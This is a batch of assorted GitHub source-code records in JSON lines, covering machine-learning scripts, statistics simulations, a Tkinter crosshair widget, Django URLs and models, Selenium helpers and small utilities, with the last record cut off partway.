+{"seq_id":"9712132913","text":"import sys\nimport json\nfrom model import SalesPredictionLSTM\nfrom data_utils import load_timeseries\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ntrain_file = \"data/sales.csv\"\nwindow_size = 6\ntrain_test_split = 0.8\n(\n x_train, y_train, x_test, y_test,\n x_test_raw, y_test_raw,\n last_window_raw, last_window\n) = load_timeseries(train_file, window_size, train_test_split)\n\nmodel = SalesPredictionLSTM(\n layers=[window_size, 100, 100, 1],\n dropout=0.2,\n batch_size=100,\n epochs=100,\n validation_split=0.1\n)\n\nmodel.build_model()\n\nmodel.train(x_train, y_train)\nmodel.save_weights('weights.h5')\n","repo_name":"sushantMoon/isi-nna","sub_path":"assignment7/server-train.py","file_name":"server-train.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
+{"seq_id":"29556550837","text":"# This is the first cell with code: set up the Python environment\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport matplotlib.pyplot as plt\nimport math\nimport numpy as np\nimport scipy as sp\nimport scipy.stats\nfrom scipy.stats import binom\nimport pandas as pd\nfrom ipywidgets import interact, interactive, fixed\nimport ipywidgets as widgets\nfrom IPython.display import clear_output, display, HTML\n\ndef binoLowerCL(n, x, cl = 0.975, inc=0.000001, p = None):\n \"Lower confidence level cl confidence interval for Binomial p, for x successes in n trials\"\n if p is None:\n p = float(x)/float(n)\n lo = 0.0\n if (x > 0):\n f = lambda q: cl - scipy.stats.binom.cdf(x-1, n, q)\n lo = sp.optimize.brentq(f, 0.0, p, xtol=inc)\n return lo\n\ndef binoUpperCL(n, x, cl = 0.975, inc=0.000001, p = None):\n \"Upper confidence level cl confidence interval for Binomial p, for x successes in n trials\"\n if p is None:\n p = float(x)/float(n)\n hi = 1.0\n if (x < n):\n f = lambda q: scipy.stats.binom.cdf(x, n, q) - (1-cl)\n hi = sp.optimize.brentq(f, p, 1.0, xtol=inc) \n return hi\n\n# Population of two values, {0, 1}, in various proportions. Amounts to Binomial random variable\nns = np.array([25, 50, 100, 400]) # sample sizes\nps = np.array([.001, .01, 0.1]) # mixture fractions, proportion of 1s in the population\nalpha = 0.05 # 1- (confidence level)\nreps = int(1.0e3) # just for demonstration\nvals = [0, 1]\n\nsimTable = pd.DataFrame(columns=('fraction of 1s', 'sample size', 'Student-t cov', 'Binom cov', 'Student-t len', 'Binom len'))\nfor p in ps:\n popMean = p\n for n in ns:\n tCrit = sp.stats.t.ppf(q=1.0-alpha/2, df=n-1)\n samMean = np.zeros(reps)\n sam = sp.stats.binom.rvs(n, p, size=reps)\n samMean = sam/float(n)\n samSD = np.sqrt(samMean*(1-samMean)/(n-1))\n coverT = (np.fabs(samMean-popMean) < tCrit*samSD).sum()\n aveLenT = 2*(tCrit*samSD).mean()\n coverB = 0\n totLenB = 0.0\n for r in range(int(reps)): \n lo = binoLowerCL(n, sam[r], cl=1.0-alpha/2)\n hi = binoUpperCL(n, sam[r], cl=1.0-alpha/2)\n coverB += ( p >= lo) & (p <= hi)\n totLenB += hi-lo\n simTable.loc[len(simTable)] = p, n, str(100*float(coverT)/float(reps)) + '%', str(100*float(coverB)/float(reps)) + '%', str(round(aveLenT,4)), str(round(totLenB/float(reps),4))\n#\nansStr = 'Simulated coverage probability and expected length of Student-t and Binomial confidence intervals for a {0, 1} population ' + 'Nominal coverage probability ' + str(100*(1-alpha)) + '% .Estimated from ' + str(int(reps)) + ' replications. '\ndisplay(HTML(ansStr))\ndisplay(simTable)\n\n# Nonstandard mixture: a pointmass at zero and a uniform[0,1]\nns = np.array([25, 50, 100, 400]) # sample sizes\nps = np.array([0.9, 0.99, 0.999]) # mixture fraction, weight of pointmass\nthresh = [0.2, 0.1, 0.01, .001]\nalpha = 0.05 # 1- (confidence level)\nreps = 1.0e3 # just for demonstration\n\ncols = ['mass at 0', 'sample size', 'Student-t cov']\nfor i in range(len(thresh)):\n cols.append('Bin t=' + str(thresh[i]) + ' cov')\ncols.append('Student-t len')\nfor i in range(len(thresh)):\n cols.append('Bin t=' + str(thresh[i]) + ' len')\n\n\nsimTable = pd.DataFrame(columns=cols)\n\nfor p in ps:\n popMean = (1-p)*0.5 # p*0 + (1-p)*.5\n for n in ns:\n tCrit = sp.stats.t.ppf(q=1-alpha, df=n-1)\n coverT = 0 # coverage of t intervals\n tUp = 0 # mean upper bound of t intervals\n coverB = np.zeros(len(thresh)) # coverage of binomial threshold intervals\n bUp = np.zeros(len(thresh)) # mean upper bound of binomial threshold intervals\n for rep in range(int(reps)):\n sam = np.random.uniform(size=n)\n ptMass = np.random.uniform(size=n)\n sam[ptMass < p] = 0.0\n samMean = np.mean(sam)\n samSD = np.std(sam, ddof=1)\n tlim = samMean + tCrit*samSD\n coverT += (popMean <= tlim) # one-sided Student-t\n tUp += tlim\n for i in range(len(thresh)):\n x = (sam > thresh[i]).sum() # number of binomial \"successes\"\n pPlus = binoUpperCL(n, x, cl=1-alpha)\n blim = thresh[i]*(1.0-pPlus) + pPlus\n coverB[i] += (popMean <= blim)\n bUp[i] += blim\n theRow = [p, n, str(100*float(coverT)/float(reps)) + '%']\n for i in range(len(thresh)):\n theRow.append(str(100*float(coverB[i])/float(reps)) + '%')\n theRow.append(str(round(tUp/float(reps), 3)))\n for i in range(len(thresh)):\n theRow.append(str(round(bUp[i]/float(reps), 3)))\n simTable.loc[len(simTable)] = theRow\n#\nansStr = 'Simulated coverage probability and expected lengths of one-sided Student-t confidence intervals and threshold ' + 'Binomial intervals for mixture of U[0,1] and pointmass at 0 ' + 'Nominal coverage probability ' + str(100*(1-alpha)) + '% . Estimated from ' + str(int(reps)) + ' replications. '\n\ndisplay(HTML(ansStr))\ndisplay(simTable)\n\nget_ipython().run_line_magic('run', 'talkTools.py')\n\n\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/binom.py","file_name":"binom.py","file_ext":"py","file_size_in_byte":5364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"44714386104","text":"from __future__ import division\nimport math\nimport sys\nif sys.version_info.major > 2:\n import tkinter as tk\nelse:\n import Tkinter as tk\n\nfrom .. import tkutil as tku\n\ntorads = math.pi / 180\ndef hit(x, y, tx, ty, vx, vy):\n \"\"\"Calculate hit point given x, y of a corner.\"\"\"\n if not vx:\n mul = (ty-y) / vy\n elif not vy:\n mul = (tx-x) / vx\n else:\n mulx = (tx-x) / vx\n muly = (ty-y) / vy\n mul = muly if abs(mulx) > abs(muly) else mulx\n return x + vx*mul, y + vy*mul\n\nclass Crosshairs(object):\n \"\"\"Crosshairs on mouse.\"\"\"\n TAG = '_crosshair'\n def __init__(self, master):\n self._vec = (1, 0)\n self.idns = [\n master.create_line(0, 0, 0, 0),\n master.create_line(0, 0, 0, 0),\n master.create_line(0, 0, 0, 0),\n master.create_line(0, 0, 0, 0)]\n for idn in self.idns:\n master.addtag(self.TAG, 'withtag', idn)\n for idn in self.idns[::2]:\n master.addtag('_crossh', 'withtag', idn)\n for idn in self.idns[1::2]:\n master.addtag('_crossv', 'withtag', idn)\n master.itemconfigure(self.TAG, state='disabled')\n for idn in self.idns[:2]:\n master.addtag('_crossb', 'withtag', idn)\n master.itemconfigure(idn, fill='black', width=3)\n for idn in self.idns[2:]:\n master.addtag('_crossf', 'withtag', idn)\n master.itemconfigure(idn, fill='white', width=1)\n tag = 'CanvasCrosshairs'\n if tag not in master.bindtags():\n tku.subclass(master, tag)\n if not master.bind_class(tag):\n tku.add_bindings(master, tag, tupit=tku.memberit(self))\n master.configure(cursor='none')\n\n def angle(self, angleorvx, vy=None, degrees=True):\n \"\"\"Set the crosshairs angle.\n\n angleorvx: angle (if vy is None) else vector x direction\n vy: if given, then the crosshair direction is (angleorvx, vy)\n degrees: if vy is None, is angleorvx in degrees or radians.\n \"\"\"\n if vy is None:\n if degrees:\n angle = (angleorvx % 90) * torads\n else:\n angle = angleorvx % (math.pi / 4)\n self._vec = (math.cos(angle), math.sin(angle))\n else:\n vx = angleorvx\n if vx * vy > 0:\n self._vec = abs(vx), abs(vy)\n else:\n if not (vx or vy):\n self._vec = (1, 0)\n else:\n self._vec = abs(vy), abs(vx)\n\n @tku.Bindings('', '')\n @classmethod\n def toggle(cls, widget):\n if widget.itemcget(cls.TAG, 'state') == 'disabled':\n widget.itemconfigure(cls.TAG, state='hidden')\n else:\n widget.itemconfigure(cls.TAG, state='disabled')\n\n @tku.Bindings('')\n @classmethod\n def show(cls, widget, x, y):\n widget.itemconfigure(cls.TAG, state='disabled')\n Crosshairs.draw_crosshairs(widget, x, y)\n\n @tku.Bindings('')\n @classmethod\n def hide(cls, widget):\n widget.itemconfigure(cls.TAG, state='hidden')\n\n @tku.Bindings('')\n @staticmethod\n def draw_crosshairs(widget, x, y):\n l, t = widget.xy(0,0)\n r, b = l+widget.winfo_width(), t+widget.winfo_height()\n x, y = widget.xy(x, y)\n self = widget.crosshairs\n i1, i2, i3, i4 = self.idns\n vx, vy = self._vec\n if vy:\n x1, y1 = hit(x, y, l, t, -vx, -vy)\n x2, y2 = hit(x, y, r, b, vx, vy)\n widget.coords(i1, x1, y1, x2, y2)\n widget.coords(i3, x1, y1, x2, y2)\n x1, y1 = hit(x, y, r, t, -vy, vx)\n x2, y2 = hit(x, y, l, b, vy, -vx)\n widget.coords(i2, x1, y1, x2, y2)\n widget.coords(i4, x1, y1, x2, y2)\n else:\n widget.coords(i1, l, y, r, y)\n widget.coords(i3, l, y, r, y)\n widget.coords(i2, x, t, x, b)\n widget.coords(i4, x, t, x, b)\n\n","repo_name":"j-hsiao/py-labeler","sub_path":"jhsiao/labeler/crosshairs.py","file_name":"crosshairs.py","file_ext":"py","file_size_in_byte":4015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"2148070739","text":"import arff, numpy as np\nimport pandas as pd\nimport sys\n\n# input arguments:\nif len(sys.argv) != 3:\n sys.stderr.write('USAGE: *.py \\n')\n sys.stderr.write('Convert BlueDesc output ARFF to the standard CSV file\\n')\n exit()\nfor arg in sys.argv:\n if arg == '-h' or arg == '--help':\n sys.stderr.write('USAGE: *.py \\n')\n sys.stderr.write('Convert BlueDesc output ARFF to the standard CSV file\\n')\n exit()\n\nin_file = sys.argv[1]\nout_file = sys.argv[2]\n\ndataset = arff.load(open(in_file))\ndata = np.array(dataset['data'],dtype=np.float64)\nheader = np.array(dataset['attributes'])[:, 0]\n\nmols = []\nwith open(in_file, 'r') as iFile:\n for a in iFile:\n if a[:15] =='% NAME OF MOLEC':\n mol_id = a.strip().split(' ')[-1]\n mols.append(mol_id)\n\nfinal_df = pd.DataFrame(data, columns=header)\nfinal_df.index = mols\nfinal_df.dropna(axis=1, inplace=True)\nfinal_df.index.name = 'Id'\n# Add mean values for Na3VO4\nfinal_df.loc['EOS100042'] = final_df.mean()\nsys.stdout.write(f\"added mean values for EOS100042 (Na3VO4)\\n\")\nfinal_df.to_csv(out_file)\nsys.stdout.write(f\"Shape: {final_df.shape}\\n\")\n\n","repo_name":"knawel/EUOS-SLAS","sub_path":"data/arff_to_csv.py","file_name":"arff_to_csv.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"4139316401","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 7 01:47:14 2019\n\n@author: Mr.Reliable\n\"\"\"\n\n#https://www.nowcoder.com/practice/ab900f183e054c6d8769f2df977223b5?tpId=90&tqId=30789&tPage=1&rp=1&ru=%2Fta%2F2018test&qru=%2Fta%2F2018test%2Fquestion-ranking\n\n\"\"\"\n牛牛又从生物科研工作者那里获得一个任务,这次牛牛需要帮助科研工作者从DNA序列s中找出最短没有出现在DNA序列s中的DNA片段的长度。\n例如:s = AGGTCTA\n序列中包含了所有长度为1的('A','C','G','T')片段,但是长度为2的没有全部包含,例如序列中不包含\"AA\",所以输出2。\n\n输入:输入包括一个字符串s,字符串长度length(1 ≤ length ≤ 2000),其中只包含'A','C','G','T'这四种字符\n输出:输出一个正整数,即最短没有出现在DNA序列s中的DNA片段的长度。\n\neg:\nAGGTCTA\n2\n\n\"\"\"\ns = input().strip()\n#print(len(s))\nfor i in range(6):\n if 4**i <= len(s) <4**(i+1):\n k = i+1\n \n \ntmp_1 = []\nfor j in range(k):\n tmp = []\n for m in range(len(s)-j):\n tmp.append(s[m:m+j+1])\n se = set(tmp)\n if len(se) < 4**(j+1):\n tmp_1.append(j+1)\n \nprint(tmp_1[0])","repo_name":"alpharol/algorithm_python3","sub_path":"nowcoder/0014.DNA序列.py","file_name":"0014.DNA序列.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"38466301498","text":"\"\"\"begin URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.urls import path, re_path,include\nfrom .views import (\n\thome_page,\n\tcontact_page,\n\tabout_page,\n\tsmile_page,\n login_page,\n register_page,\n logout_view,\n gallery_page, \n set_timezone,\n\t)\nfrom account.views import (\n account_info_view,\n # account_update_info_view,\n user_profile,\n profile_page,\n account_detail_info_view,\n profile_create_view,\n )\nfrom blog.views import blog_post_create_view\nfrom searches.views import search_view \nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',home_page),\n re_path(r'^page/$',about_page),\n re_path(r'^pages/$',about_page),\n re_path(r'^about/$',about_page),\n path('contact/',contact_page),\n path('blog-new/',blog_post_create_view),\n path('blog/',include('blog.urls')), #by proving include('blog.urls') we give the location of the content that we have\n path('smile/',smile_page),\n path('search/',search_view),\n path('login/',login_page),\n path('logout/',logout_view),\n path('register/',register_page),\n path('avatar/',include('avatar.urls')),\n path('timezone/',set_timezone),\n path('account/',include('account.urls')),\n path('account-create/',profile_create_view),\n path('gallery/',gallery_page),\n # path('user-profile/',user_profile),\n # path('account-detail//',account_detail_info_view),\n # path('account-update/',account_update_info_view)\n]\n\nif settings.DEBUG:\n #TEST MODE\n from django.conf.urls.static import static\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"askhatov/Ask-blog","sub_path":"begin/begin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"34223773375","text":"# Reference\n# https://docs.opencv.org/4.0.1/d6/d0f/group__dnn.html\n\nimport cv2\nimport imutils\nfrom imutils.video import WebcamVideoStream\n\n# Load the model\nnet = cv2.dnn.readNet('../model/face-detection-adas-0001.xml', '../model/face-detection-adas-0001.bin') \n\n# Specify target device\nnet.setPreferableTarget(cv2.dnn.DNN_TARGET_MYRIAD)\n\n# Read the Camera\nvs = WebcamVideoStream(src=0).start()\n\nwhile True:\n # grab the frame from the threaded video stream and resize it\n # to have a maximum width of 400 pixels\n frame = vs.read()\n frame = imutils.resize(frame, width=600)\n\n\n # Prepare input blob and perform an inference\n blob = cv2.dnn.blobFromImage(frame, size=(672, 384), ddepth=cv2.CV_8U) \n\n net.setInput(blob) \n\n out = net.forward()\n\n # Draw detected faces on the frame\n for detection in out.reshape(-1, 7): \n\n confidence = float(detection[2]) \n\n xmin = int(detection[3] * frame.shape[1]) \n ymin = int(detection[4] * frame.shape[0]) \n\n xmax = int(detection[5] * frame.shape[1]) \n ymax = int(detection[6] * frame.shape[0])\n\n if confidence > 0.5:\n cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), color=(0, 255, 0))\n \n cv2.imshow(\"Frame\", frame)\n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n\n# do a bit of cleanup\ncv2.destroyAllWindows()\nvs.stop()","repo_name":"HsinM/OpenVINO-NCS","sub_path":"pi_code/face/code/webcam_test.py","file_name":"webcam_test.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"}
+{"seq_id":"42230743988","text":"\nfrom .base_strategy import BaseStrategy\n\nclass SAR(BaseStrategy):\n NAME = 'sar'\n # Feature, Bias, Scaler\n FEATURES = [\n ['sar_bias', 0, 5],\n ['sar_diff', 0, 30],\n ['sar_diff_pre', 0, 30],\n ['change', 0, 10],\n ['amp_0105', 0, 2],\n ['amp_0510', 0, 1],\n ]\n DNA_LEN = len(FEATURES)*2\n","repo_name":"hellojixian/stock-ai","sub_path":"lib/indicators/sar.py","file_name":"sar.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"38"}
+{"seq_id":"44074281615","text":"import requests\n\napi_base = 'https://icanhazdadjoke.com/'\n\nheaders = {'accept': 'application/json'}\n\nprint('---------HERE ARE 10 JOKES HAHAHAHA------------')\nfor x in range(10):\n response = requests.get(api_base, headers)\n\n if response.status_code == 200:\n resp_as_json = response.json()\n print(resp_as_json['joke'])\n else:\n print('Oops... didn\\'t work')\n","repo_name":"cecilphillip/python-stream","sub_path":"src/dadjokes.py","file_name":"dadjokes.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"38"}
+{"seq_id":"29533268887","text":"import numpy as np\nnp.random.seed(1)\nimport sys\n\ndef relu(x):\n return (x>0)*x\n\ndef relu2deriv(output):\n return (output>0)\n\n# Input data\n\nalpha,iterations=(0.1,100)\npixels_per_image,num_labels,hidden_size=(784,10,100)\n\nweights_0_1=0.2*np.random.random((pixels_per_image,hidden_size))-0.1\nweights_1_2=0.2*np.random.random((hidden_size,num_labels))-0.1\n\nfor j in xrange(iteratins):\n error=0\n correct_cnt=0\n for i in xrange(len(images)/batch_size):\n batch_start,batch_end=((i*batch_size),((i+1)*batch_size))\n layer_0=images[batch_start:batch_end]\n layer_1=relu(np.dot(layer_0,weights_0_1))\n dropout_mask=np.random.randint(2,size=layer_1.shape)\n layer_1*=dropout_mask\n layer_2=np.dot(layer_1,weights_1_2)\n \n error+=np.sum((labels[batch_start:batch_end]-layer_2)**2)\n \n for k in xrange(batch_size):\n correct_cnt+=int(np.argmax(layer_2[k:k+1])==np.argmax(labels[batch_start+k:batch_start+k+1]))\n \n delta_layer_2=(layer_2-labels[batch_start:batch_end])/batch_size\n delta_layer_1=delta_layer_2.dot(weights_1_2.T)*relu2deriv(layer_1)\n \n delta_layer_1*=dropout_mask\n \n weights_1_2-=alpha*layer_1.T*dot(delta_layer_2)\n weights_0_1-=alpha*layer_0.T*dot(delta_layer_1)\n \n\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/4. Batch Gradient Descent.py","file_name":"4. Batch Gradient Descent.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"20700099591","text":"import os\nimport sys\nimport csv\n\n\ndef fileAccess():\n\twith open('test.txt') as f:\n\t\tfor line in f:\n\t\t\tprint(line.strip())\n\n\tprint('-------------------------------------------------------------------')\n\n\twith open('test2.csv') as cf:\n\t\treader = csv.reader(cf, delimiter=' ')\n\t\twith open('test3.csv', 'w') as cf2:\n\t\t\twriter = csv.writer(cf2, delimiter=' ')\n\t\t\tfor row in reader:\n\t\t\t\twriter.writerow([row[1]])\n\t\n\t\ndef main():\n fileAccess()\n\nif __name__ == '__main__':\n main()\t\n","repo_name":"ShashwathKumar/PythonTests","sub_path":"JARVIS/fileWrites/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"41559602437","text":"# Name: Basemaps\n# Author: Marios S. Kyriakou, KIOS Research and Innovation Center of Excellence (KIOS CoE)\n# Email: mariosmsk@gmail.com\n# License: MIT\n\n# This plugin works with EPANET MTP4r2:\n# https://github.com/USEPA/SWMM-EPANET_User_Interface/releases/tag/MTP4r2\nimport os\n\nplugin_name = \"Basemaps\"\nplugin_create_menu = True\n__all__ = {\"Google Satellite\":1, \"Openstreetmap\":2}\n\n\ndef checkBasemaps(session, mapname):\n status = True\n for tlayer in session.map_widget.base_group.findLayers():\n if tlayer.layer().name() == mapname:\n session.map_widget.remove_layers([tlayer.layer()])\n session.map_widget.base_group.removeChildNode(tlayer)\n status = False\n break\n return status\n\ndef run(session=None, choice=None):\n\n path = os.getcwd() + \"\\\\plugins\\\\Basemaps\\\\\"\n if choice is None:\n choice = 99\n if choice == 1:\n mapname = \"Google Satellite.xml\"\n status = checkBasemaps(session, mapname)\n if not status:\n return\n\n elif choice == 2:\n mapname = \"Openstreetmap.xml\"\n status = checkBasemaps(session, mapname)\n if not status:\n return\n\n if choice ==1 or choice == 2:\n urlWithParams = path + mapname\n session.map_widget.addRasterLayer(urlWithParams)\n session.map_widget.refresh_extent_needed = False\n","repo_name":"ppavlo02/EPANET-Plugins","sub_path":"Basemaps/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"}
+{"seq_id":"9729459135","text":"import numpy as np\nfrom nbayes2 import *\nimport timeit\n\n# def cmp_NaiveBayes():\ndata = np.genfromtxt('vote_filled.tsv', dtype = int)\nX = data[:, :-1]\ny = data[:, -1]\n\nclr1 = NaiveBayes1()\nclr1.fit(X, y)\nprint(clr1.fit(X, y))\n\nclr2 = NaiveBayes2()\nclr2.fit(X, y)\nprint(clr2.fit(X, y))\n\n# if __name__ == '__main__':\n\n## timeit setups ( 100 hundred exe)\nprint(timeit.timeit(\"print('ie-i')\", setup=\"print('Start timeit')\", number = 100))\nprint(\"NaiveBayes1 = \", timeit.timeit(NaiveBayes1))\nprint(\"NaiveBayes2 = \", timeit.timeit(NaiveBayes2))\n# print(timeit.timeit(clr1.fit(X, y)))\n# print(timeit.timeit(clr2.fit(X, y)))\n","repo_name":"jusui/Data_Science","sub_path":"ML_algorithm/nbayes_1/cmp_NaiveBayes.py","file_name":"cmp_NaiveBayes.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"28426454932","text":"\"\"\" \r\nUzrakstiet programmu, kas ielasa skaitli (kā float) -\r\nriņķa līnijas rādiusu un izvada uz ekrāna (print) \r\nriņķa līnijas garumu un laukumu, atbilstoši noformējot atbildi.\r\nPārbaudiet programmas darbību ar dažādiem ievaddatiem.\r\n\"\"\"\r\n\r\nrādius=float(input(\"Ievadi rādiusu!\"))\r\n\r\nlaukums=3.14*(rādius*rādius)\r\nlinijas_garums=2*3.14*rādius\r\n\r\nprint(\"Riņķa laukums ir:3\",laukums)\r\nprint(\"Riņķa līnijas garums ir:\",linijas_garums)","repo_name":"elinaavintisa/praktikums_Python","sub_path":"uzd1.py","file_name":"uzd1.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"lv","doc_type":"code","dataset":"github-code","pt":"38"}
+{"seq_id":"35489474866","text":"import time\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\n\nGET_WINDOW_YOFFSET_SCRIPT = \"return window.pageYOffset;\"\n\n\ndef configure_driver(path: str, is_headless: bool = True) -> WebDriver:\n \"\"\"\n Creates a Chrome WebDriver instance.\n\n :param path: Path to the Chrome WebDriver executable\n :param is_headless: Specifies whether to run the driver in headless mode\n :return: A Chrome WebDriver instance\n \"\"\"\n chrome_options = Options()\n chrome_options.headless = is_headless\n driver = webdriver.Chrome(executable_path=path, options=chrome_options)\n\n return driver\n\n\ndef scroll_down(driver: WebDriver):\n \"\"\"\n Scrolls the webpage down from the current Y position\n\n :param driver: The Chrome WebDriver instance\n \"\"\"\n scroll_pos = driver.execute_script(GET_WINDOW_YOFFSET_SCRIPT)\n scroll = scroll_pos + 250\n driver.execute_script(\"window.scrollTo(0, \" + str(scroll) + \");\")\n\n # Wait for scroll to execute\n time.sleep(.5)\n\n\ndef scroll_until_find_by_class_name(class_name: str, driver: WebDriver, parent=None):\n \"\"\"\n Looks for an WebElement object by class name by scrolling down the entire webpage.\n If a parent WebElement is provided it will only search through its children WebElements.\n\n :param class_name: The WebElement class name to search for.\n :param driver: The Chrome WebDriver instance\n :param parent: (Optional) A Parent WebElement object\n :return: A WebElement object matching the given class name or None if no WebElement was found.\n \"\"\"\n # Start at top of screen\n driver.execute_script(\"window.scrollTo(0, 0);\")\n time.sleep(1)\n last_pos = driver.execute_script(GET_WINDOW_YOFFSET_SCRIPT)\n\n element = None\n while element is None:\n try:\n if parent is None:\n element = driver.find_element(By.CLASS_NAME, class_name)\n else:\n element = parent.find_element(By.CLASS_NAME, class_name)\n except NoSuchElementException:\n scroll_down(driver)\n new_pos = driver.execute_script(GET_WINDOW_YOFFSET_SCRIPT)\n if last_pos != new_pos:\n last_pos = new_pos\n else:\n return None\n return element\n","repo_name":"Nicholas-C-Brown/COSC419F-Project","sub_path":"src/helper_methods/driver_helper.py","file_name":"driver_helper.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"1058343667","text":"class CapturedPacket:\n\tdef __init__(self, number, id, type, xfer_type, epnum, devnum, busnum, setup, length, data):\n\t\tself.number = number\n\t\tself.id = id\n\t\tself.type = type\n\t\tself.xfer_type = xfer_type\n\t\tself.epnum = epnum\n\t\tself.devnum = devnum\n\t\tself.busnum = busnum\n\t\tself.setup = setup\n\t\tself.length = length\n\t\tself.data = data\n","repo_name":"aib/usb-pcap","sub_path":"usb_pcap/packet.py","file_name":"packet.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"24688780479","text":"import datetime\n\nimport requests\nfrom django.contrib.auth import get_user_model\nfrom django.db import models\n\nfrom fishingbs.accounts.models import Profile\nfrom fishingbs.accounts.validators import image_max_size_validator\nfrom fishingbs.mixins import mixins as get\n\n\nUserModel = get_user_model()\n\n\nclass GiveInformationModel(models.Model):\n FISH_TYPES = get.get_fish_types()\n LOCATIONS = get.get_locations_for_news()\n INTENSITIES = get.get_intensities()\n CATCHING_TYPES = get.get_catching_types()\n MAX_LENGTH_FISH_TYPES = get.get_max_length_of_a_sequence(FISH_TYPES)\n MAX_LENGTH_LOCATIONS = get.get_max_length_of_a_sequence(LOCATIONS)\n MAX_LENGTH_INTENSITIES = get.get_max_length_of_a_sequence(INTENSITIES)\n MAX_LENGTH_CATCHING_TYPES = get.get_max_length_of_a_sequence(CATCHING_TYPES)\n\n fish_type = models.CharField(\n max_length=MAX_LENGTH_FISH_TYPES,\n choices=FISH_TYPES,\n blank=False,\n null=False,\n )\n location = models.CharField(\n max_length=MAX_LENGTH_LOCATIONS,\n choices=LOCATIONS,\n blank=False,\n null=False,\n )\n intensity = models.CharField(\n max_length=MAX_LENGTH_INTENSITIES,\n choices=INTENSITIES,\n blank=False,\n null=False,\n )\n last_most_intense = models.TimeField(\n default=datetime.datetime.now,\n blank=False,\n null=False,\n )\n type_of_catching = models.CharField(\n max_length=MAX_LENGTH_CATCHING_TYPES,\n choices=CATCHING_TYPES,\n blank=False,\n null=False,\n )\n photo = models.ImageField(\n upload_to='catches/',\n validators=[\n image_max_size_validator,\n ],\n blank=True,\n null=True,\n )\n comment = models.TextField(\n max_length=1500,\n blank=True,\n null=True,\n )\n created_on = models.DateTimeField(\n auto_now_add=True,\n )\n from_user = models.ForeignKey(\n Profile,\n on_delete=models.CASCADE,\n blank=False,\n null=False,\n default=1,\n )\n\n","repo_name":"Lasabito/fishing_bs","sub_path":"fishingbs/fishingbs/news/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"7530642537","text":"from imageai.Detection import ObjectDetection, keras_retinanet\r\nimport os\r\nfrom PIL import Image\r\nimport base64\r\nimport logging as log\r\nfrom flask import Flask, request, make_response\r\nfrom flask_restful import Resource, Api\r\nimport flask_restful as restful\r\nfrom keras.engine.saving import load_model\r\nfrom sqlalchemy import create_engine\r\nfrom json import dumps\r\nfrom flask import jsonify\r\nfrom flask_classful import FlaskView\r\nimport json\r\nfrom keras import backend as K\r\nimport tensorflow as tf\r\nfrom tkinter.filedialog import askopenfilename\r\nfrom pathlib import Path\r\nfrom tkinter import Tk\r\n\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\nresult = dict()\r\n\r\n\r\ndef init():\r\n global model, graph\r\n # load the pre-trained Keras model\r\n # model = load_model('resnet50_coco_best_v2.0.1.h5')\r\n graph = tf.get_default_graph()\r\n\r\nTk().withdraw()\r\nfilename = askopenfilename()\r\nimg = Path(filename).name\r\nwith open(filename, \"rb\") as imageFile:\r\n # converting download.jpg to a String\r\n 